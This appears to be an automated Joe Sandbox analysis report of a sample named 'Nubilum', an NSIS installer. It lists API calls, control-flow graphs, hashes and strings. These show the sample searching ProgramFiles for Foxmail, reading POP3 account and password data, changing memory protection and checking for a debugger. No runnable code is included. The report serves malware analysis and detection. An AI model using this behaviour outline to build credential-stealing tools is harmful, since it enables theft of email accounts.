1fab56b9 RtlLeaveCriticalSection 7293->7308 7295 1fab7429 7295->7266 7296->7280 7298 1fab637b _abort 20 API calls 7297->7298 7300 1fab8b46 7298->7300 7299 1fab8b53 7301 1fab571e _free 20 API calls 7299->7301 7300->7299 7302 1fab5eb7 11 API calls 7300->7302 7303 1fab8ba5 7301->7303 7302->7300 7303->7280 7307 1fab56b9 RtlLeaveCriticalSection 7304->7307 7306 1fab8c79 7306->7277 7307->7306 7308->7295

                          Control-flow Graph

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1FAB1137
                          • lstrcatW.KERNEL32(?,?), ref: 1FAB1151
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB115C
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB116D
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB117C
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB1193
                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1FAB11D0
                          • FindClose.KERNEL32(00000000), ref: 1FAB11DB
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                          • String ID:
                          • API String ID: 1083526818-0
                          • Opcode ID: 68d28656b81e288df528d907845d0120473ce0b8792a46b9827b0c3e59774abd
                          • Instruction ID: e5dc9e03aa5e2273f851f34bab8d2ad50504bf271898b6dfd50c04fc79e8417b
                          • Opcode Fuzzy Hash: 68d28656b81e288df528d907845d0120473ce0b8792a46b9827b0c3e59774abd
                          • Instruction Fuzzy Hash: BF2193725043586BD710EA649C4CF9B7BDCEF84324F00092EF959D3190EB39E61587D6

                          Control-flow Graph

                          APIs
                          • Sleep.KERNEL32(00000005), ref: 022372D4
                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 02237358
                          Memory Dump Source
                          • Source File: 00000010.00000002.3672277359.0000000001BE4000.00000040.00000400.00020000.00000000.sdmp, Offset: 01BE4000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1be4000_Nubilum.jbxd
                          Yara matches
                          Similarity
                          • API ID: MemoryProtectSleepVirtual
                          • String ID:
                          • API String ID: 3235210055-0
                          • Opcode ID: 2729bf3e154ab1b3b2d93174328ae760249f3bb61839a77381a50de40b4ecc72
                          • Instruction ID: 4884b9d978221ab76e2527a80418c4be155a2b299f22490cad05cc6e1dadf8a3
                          • Opcode Fuzzy Hash: 2729bf3e154ab1b3b2d93174328ae760249f3bb61839a77381a50de40b4ecc72
                          • Instruction Fuzzy Hash: 5B112BF05603404FE7015F64C99CB8AB765EF04751F958185E941DB0EAC378C989CF22

                          Control-flow Graph

                          APIs
                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1FAB1434
                            • Part of subcall function 1FAB10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1FAB1137
                            • Part of subcall function 1FAB10F1: lstrcatW.KERNEL32(?,?), ref: 1FAB1151
                            • Part of subcall function 1FAB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB115C
                            • Part of subcall function 1FAB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB116D
                            • Part of subcall function 1FAB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB117C
                            • Part of subcall function 1FAB10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FAB1193
                            • Part of subcall function 1FAB10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1FAB11D0
                            • Part of subcall function 1FAB10F1: FindClose.KERNEL32(00000000), ref: 1FAB11DB
                          • lstrlenW.KERNEL32(?), ref: 1FAB14C5
                          • lstrlenW.KERNEL32(?), ref: 1FAB14E0
                          • lstrlenW.KERNEL32(?,?), ref: 1FAB150F
                          • lstrcatW.KERNEL32(00000000), ref: 1FAB1521
                          • lstrlenW.KERNEL32(?,?), ref: 1FAB1547
                          • lstrcatW.KERNEL32(00000000), ref: 1FAB1553
                          • lstrlenW.KERNEL32(?,?), ref: 1FAB1579
                          • lstrcatW.KERNEL32(00000000), ref: 1FAB1585
                          • lstrlenW.KERNEL32(?,?), ref: 1FAB15AB
                          • lstrcatW.KERNEL32(00000000), ref: 1FAB15B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                          • String ID: )$Foxmail$ProgramFiles
                          • API String ID: 672098462-2938083778
                          • Opcode ID: 6b64e03d0992e300e4fba0eb77b6fd577105b620b7a1e42e3dc370d322f7f285
                          • Instruction ID: 1c5de305737a8cb0f923d295a237e8b981fea3ea6625339dae0a5bf781cba831
                          • Opcode Fuzzy Hash: 6b64e03d0992e300e4fba0eb77b6fd577105b620b7a1e42e3dc370d322f7f285
                          • Instruction Fuzzy Hash: E281B075A10358AADB20DBA0DC85FEE737DEF84710F00059AF608E7190EA7D6A85CF95
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1FAB61DA
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 1FAB61E4
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1FAB61F1
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 3febe70c27773907489a634602b6a6f2f88ef9432bed87e348b21ef17e5fb071
                          • Instruction ID: e257f4a559f0aa618f246503b03e152d129a2f6218e0fa68050e465237d16f42
                          • Opcode Fuzzy Hash: 3febe70c27773907489a634602b6a6f2f88ef9432bed87e348b21ef17e5fb071
                          • Instruction Fuzzy Hash: C431B57590122C9BCB21DF68D9887CDBBB8EF08310F5041DAE81CA7260E738AB958F45
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,1FAB4A8A,?,1FAC2238,0000000C,1FAB4BBD,00000000,00000000,00000001,1FAB2082,1FAC2108,0000000C,1FAB1F3A,?), ref: 1FAB4AD5
                          • TerminateProcess.KERNEL32(00000000,?,1FAB4A8A,?,1FAC2238,0000000C,1FAB4BBD,00000000,00000000,00000001,1FAB2082,1FAC2108,0000000C,1FAB1F3A,?), ref: 1FAB4ADC
                          • ExitProcess.KERNEL32 ref: 1FAB4AEE
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 7f2783fdb1259fb2498e92ddba1d0db66f4b45c12850400067734e34b38c0068
                          • Instruction ID: 3f5e44d521cceaa8d92e4a7a30c701c2cc2924d9eb7d189293f471ed8fbb41e4
                          • Opcode Fuzzy Hash: 7f2783fdb1259fb2498e92ddba1d0db66f4b45c12850400067734e34b38c0068
                          • Instruction Fuzzy Hash: 48E0BF35010255AFCF016F59CD58A493B6DFF44351F204018FD054B131DB3EE953CA95
                          APIs
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: a7069d5f3facdc62ab2a3fd15b2413440890c9e9f71daf6a1d8fe38f356a1512
                          • Instruction ID: df0272889489fabe599918155ad9046b0c21ce802fa5063e207317f3f55c778e
                          • Opcode Fuzzy Hash: a7069d5f3facdc62ab2a3fd15b2413440890c9e9f71daf6a1d8fe38f356a1512
                          • Instruction Fuzzy Hash: 6EA011302003238FC3008E38828A20C3AACAA002A030000A8E80BC8020EB2A80228A82

                          Control-flow Graph

                          APIs
                            • Part of subcall function 1FAB1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D1B
                            • Part of subcall function 1FAB1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1FAB1D37
                            • Part of subcall function 1FAB1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D4B
                          • _strlen.LIBCMT ref: 1FAB1855
                          • _strlen.LIBCMT ref: 1FAB1869
                          • _strlen.LIBCMT ref: 1FAB188B
                          • _strlen.LIBCMT ref: 1FAB18AE
                          • _strlen.LIBCMT ref: 1FAB18C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _strlen$File$CopyCreateDelete
                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                          • API String ID: 3296212668-3023110444
                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction ID: 6303e6fe990e566890fd7bef274a7cbf5d0966ad51d493e60ecf78a937d0a588
                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction Fuzzy Hash: 48610579D00359ABEF11CBA4C980BDEB7BDAF05204F00415ED504A7254EB7C7A46CB52

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: %m$~$Gon~$~F@7$~dra
                          • API String ID: 4218353326-230879103
                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction ID: fb64f1c72c7351798b31f35c64efa961340f5cbfc17b32bbe9fd22d636cb1da3
                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction Fuzzy Hash: F571D4B5D002695BDF129BB49998ADF7BFCAF09200F10409ED944E7241E67DB789CBA0

                          Control-flow Graph

                          APIs
                          • SetErrorMode.KERNEL32 ref: 00403334
                          • GetVersion.KERNEL32 ref: 0040333A
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403363
                          • #17.COMCTL32(00000007,00000009), ref: 00403386
                          • OleInitialize.OLE32(00000000), ref: 0040338D
                          • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 004033A9
                          • GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 004033BE
                          • GetModuleHandleW.KERNEL32(00000000,007B3000,00000000), ref: 004033D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3667692918.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.3667545006.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3667820784.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3668783744.000000000040A000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.00000000007DD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.000000000081D000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CommandErrorFileHandleInfoInitializeLineModeModuleVersionlstrlen
                          • String ID: NSIS Error$UXTHEME
                          • API String ID: 165832124-110662866
                          • Opcode ID: 39b3a9f5ad0ac039a9ff7162e159cd2222a651d6c59ca196bc6a99020442cb50
                          • Instruction ID: 467a19430651147c4644d7afb8447772ad6a828b06a52198539827d8ef9fb21e
                          • Opcode Fuzzy Hash: 39b3a9f5ad0ac039a9ff7162e159cd2222a651d6c59ca196bc6a99020442cb50
                          • Instruction Fuzzy Hash: EA214A70541701AFD310BF61AE49B1B3AA8EF44309F41843EF986B62A2DF7C49458B6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 236 1fab7cc2-1fab7cd6 237 1fab7cd8-1fab7cdd 236->237 238 1fab7d44-1fab7d4c 236->238 237->238 239 1fab7cdf-1fab7ce4 237->239 240 1fab7d4e-1fab7d51 238->240 241 1fab7d93-1fab7dab call 1fab7e35 238->241 239->238 242 1fab7ce6-1fab7ce9 239->242 240->241 244 1fab7d53-1fab7d90 call 1fab571e * 4 240->244 251 1fab7dae-1fab7db5 241->251 242->238 245 1fab7ceb-1fab7cf3 242->245 244->241 249 1fab7d0d-1fab7d15 245->249 250 1fab7cf5-1fab7cf8 245->250 253 1fab7d2f-1fab7d43 call 1fab571e * 2 249->253 254 1fab7d17-1fab7d1a 249->254 250->249 255 1fab7cfa-1fab7d0c call 1fab571e call 1fab90ba 250->255 256 1fab7db7-1fab7dbb 251->256 257 1fab7dd4-1fab7dd8 251->257 253->238 254->253 259 1fab7d1c-1fab7d2e call 1fab571e call 1fab91b8 254->259 255->249 264 1fab7dbd-1fab7dc0 256->264 265 1fab7dd1 256->265 260 1fab7dda-1fab7ddf 257->260 261 1fab7df0-1fab7dfc 257->261 259->253 268 1fab7ded 260->268 269 1fab7de1-1fab7de4 260->269 261->251 271 1fab7dfe-1fab7e0b call 1fab571e 261->271 264->265 273 1fab7dc2-1fab7dd0 call 1fab571e * 2 264->273 265->257 268->261 269->268 276 1fab7de6-1fab7dec call 1fab571e 269->276 273->265 276->268
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 1FAB7D06
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB90D7
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB90E9
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB90FB
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB910D
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB911F
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB9131
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB9143
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB9155
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB9167
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB9179
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB918B
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB919D
                            • Part of subcall function 1FAB90BA: _free.LIBCMT ref: 1FAB91AF
                          • _free.LIBCMT ref: 1FAB7CFB
                            • Part of subcall function 1FAB571E: HeapFree.KERNEL32(00000000,00000000,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?), ref: 1FAB5734
                            • Part of subcall function 1FAB571E: GetLastError.KERNEL32(?,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?,?), ref: 1FAB5746
                          • _free.LIBCMT ref: 1FAB7D1D
                          • _free.LIBCMT ref: 1FAB7D32
                          • _free.LIBCMT ref: 1FAB7D3D
                          • _free.LIBCMT ref: 1FAB7D5F
                          • _free.LIBCMT ref: 1FAB7D72
                          • _free.LIBCMT ref: 1FAB7D80
                          • _free.LIBCMT ref: 1FAB7D8B
                          • _free.LIBCMT ref: 1FAB7DC3
                          • _free.LIBCMT ref: 1FAB7DCA
                          • _free.LIBCMT ref: 1FAB7DE7
                          • _free.LIBCMT ref: 1FAB7DFF
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: edeaa7123d045aff7a9691d20d7eb1d2b7a0877ae5e2a85db31f3b870bccf435
                          • Instruction ID: 8defc8da97225e922efd0ec546d7b7218b4ee3b6003ef83326ccb4a117e2a2a2
                          • Opcode Fuzzy Hash: edeaa7123d045aff7a9691d20d7eb1d2b7a0877ae5e2a85db31f3b870bccf435
                          • Instruction Fuzzy Hash: D1314D31A00745DFEB219A38DA40BA67BEDEF44390F15495DE889DB150EEBDB880DB10

                          Control-flow Graph

                          APIs
                          • _free.LIBCMT ref: 1FAB59EA
                            • Part of subcall function 1FAB571E: HeapFree.KERNEL32(00000000,00000000,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?), ref: 1FAB5734
                            • Part of subcall function 1FAB571E: GetLastError.KERNEL32(?,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?,?), ref: 1FAB5746
                          • _free.LIBCMT ref: 1FAB59F6
                          • _free.LIBCMT ref: 1FAB5A01
                          • _free.LIBCMT ref: 1FAB5A0C
                          • _free.LIBCMT ref: 1FAB5A17
                          • _free.LIBCMT ref: 1FAB5A22
                          • _free.LIBCMT ref: 1FAB5A2D
                          • _free.LIBCMT ref: 1FAB5A38
                          • _free.LIBCMT ref: 1FAB5A43
                          • _free.LIBCMT ref: 1FAB5A51
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 86ffe61925ee7d878649167dd69267001c9ca40f43acf744308d82cf271bab06
                          • Instruction ID: fcf156da793bbaca211e7701679a142c22fe1822bb722b6a4ece076090d22684
                          • Opcode Fuzzy Hash: 86ffe61925ee7d878649167dd69267001c9ca40f43acf744308d82cf271bab06
                          • Instruction Fuzzy Hash: BE118C7DA10248FFCB11DF94C941CDD3F79EF48250B554599B9484F129EA39FA90AB80

                          Control-flow Graph

                          APIs
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D1B
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1FAB1D37
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D4B
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D58
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D72
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D7D
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FAB1D8A
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                          • String ID:
                          • API String ID: 1454806937-0
                          • Opcode ID: f6d59e6b572b0f3442575287d96b3d915c1e4298bee5d6286653f08cdc2ffb0b
                          • Instruction ID: 64e2a94d95cc54cd5b8badf84e7f6583b351370586d92162e50746e203d974d7
                          • Opcode Fuzzy Hash: f6d59e6b572b0f3442575287d96b3d915c1e4298bee5d6286653f08cdc2ffb0b
                          • Instruction Fuzzy Hash: 6721127594122CBFEB109BA48CCCEEB77ACFB08354F000969F516D2150D67DAE568BB1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 337 1fab9492-1fab94ef GetConsoleCP 338 1fab9632-1fab9644 call 1fab2ada 337->338 339 1fab94f5-1fab9511 337->339 341 1fab952c-1fab953d call 1fab7c19 339->341 342 1fab9513-1fab952a 339->342 349 1fab953f-1fab9542 341->349 350 1fab9563-1fab9565 341->350 344 1fab9566-1fab9575 call 1fab79e6 342->344 344->338 353 1fab957b-1fab959b WideCharToMultiByte 344->353 351 1fab9609-1fab9628 349->351 352 1fab9548-1fab955a call 1fab79e6 349->352 350->344 351->338 352->338 359 1fab9560-1fab9561 352->359 353->338 355 1fab95a1-1fab95b7 WriteFile 353->355 357 1fab962a-1fab9630 GetLastError 355->357 358 1fab95b9-1fab95ca 355->358 357->338 358->338 360 1fab95cc-1fab95d0 358->360 359->353 361 1fab95fe-1fab9601 360->361 362 1fab95d2-1fab95f0 WriteFile 360->362 361->339 363 1fab9607 361->363 362->357 364 1fab95f2-1fab95f6 362->364 363->338 364->338 365 1fab95f8-1fab95fb 364->365 365->361
                          APIs
                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1FAB9C07,?,00000000,?,00000000,00000000), ref: 1FAB94D4
                          • __fassign.LIBCMT ref: 1FAB954F
                          • __fassign.LIBCMT ref: 1FAB956A
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1FAB9590
                          • WriteFile.KERNEL32(?,?,00000000,1FAB9C07,00000000,?,?,?,?,?,?,?,?,?,1FAB9C07,?), ref: 1FAB95AF
                          • WriteFile.KERNEL32(?,?,00000001,1FAB9C07,00000000,?,?,?,?,?,?,?,?,?,1FAB9C07,?), ref: 1FAB95E8
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 8e62e20b1572c7902ac648cb73b2641c2fd7d187c1d140eef9bbabaf8322efa9
                          • Instruction ID: e16bafcb641a0c4dc99d00f2b80dfd52386bef77ce37d8ccbc15c309c3ea2fdf
                          • Opcode Fuzzy Hash: 8e62e20b1572c7902ac648cb73b2641c2fd7d187c1d140eef9bbabaf8322efa9
                          • Instruction Fuzzy Hash: DA51B171D04249AFCB00CFA8C895ADEBBFCFF09310F14415EE556E7291E678A951CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 366 1fab3370-1fab33b5 call 1fab3330 call 1fab37a7 371 1fab33b7-1fab33c9 366->371 372 1fab3416-1fab3419 366->372 374 1fab3439-1fab3442 371->374 375 1fab33cb 371->375 373 1fab341b-1fab3428 call 1fab3790 372->373 372->374 378 1fab342d-1fab3436 call 1fab3330 373->378 377 1fab33d0-1fab33e7 375->377 379 1fab33e9-1fab33f7 call 1fab3740 377->379 380 1fab33fd 377->380 378->374 388 1fab33f9 379->388 389 1fab340d-1fab3414 379->389 381 1fab3400-1fab3405 380->381 381->377 384 1fab3407-1fab3409 381->384 384->374 387 1fab340b 384->387 387->378 390 1fab33fb 388->390 391 1fab3443-1fab344c 388->391 389->378 390->381 392 1fab344e-1fab3455 391->392 393 1fab3486-1fab3496 call 1fab3774 391->393 392->393 395 1fab3457-1fab3466 call 1fabbbe0 392->395 399 1fab34aa-1fab34c6 call 1fab3330 call 1fab3758 393->399 400 1fab3498-1fab34a7 call 1fab3790 393->400 401 1fab3468-1fab3480 395->401 402 1fab3483 395->402 400->399 401->402 402->393
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 1FAB339B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 1FAB33A3
                          • _ValidateLocalCookies.LIBCMT ref: 1FAB3431
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1FAB345C
                          • _ValidateLocalCookies.LIBCMT ref: 1FAB34B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: ca12cef58709beac5b1e978d15909e657d533d7d882ecc4ec29d14668c2ff5c9
                          • Instruction ID: 2e8d1411f4cf2b0f4e0e3dee23d232892d3e37bde6d355c894156e81f28cfb0e
                          • Opcode Fuzzy Hash: ca12cef58709beac5b1e978d15909e657d533d7d882ecc4ec29d14668c2ff5c9
                          • Instruction Fuzzy Hash: D741D438E10348ABCB00CF68C880A9EBBB9BF45324F14819DDD159B251D73DFA55CB91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 1FAB9221: _free.LIBCMT ref: 1FAB924A
                          • _free.LIBCMT ref: 1FAB92AB
                            • Part of subcall function 1FAB571E: HeapFree.KERNEL32(00000000,00000000,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?), ref: 1FAB5734
                            • Part of subcall function 1FAB571E: GetLastError.KERNEL32(?,?,1FAB924F,?,00000000,?,00000000,?,1FAB9276,?,00000007,?,?,1FAB7E5A,?,?), ref: 1FAB5746
                          • _free.LIBCMT ref: 1FAB92B6
                          • _free.LIBCMT ref: 1FAB92C1
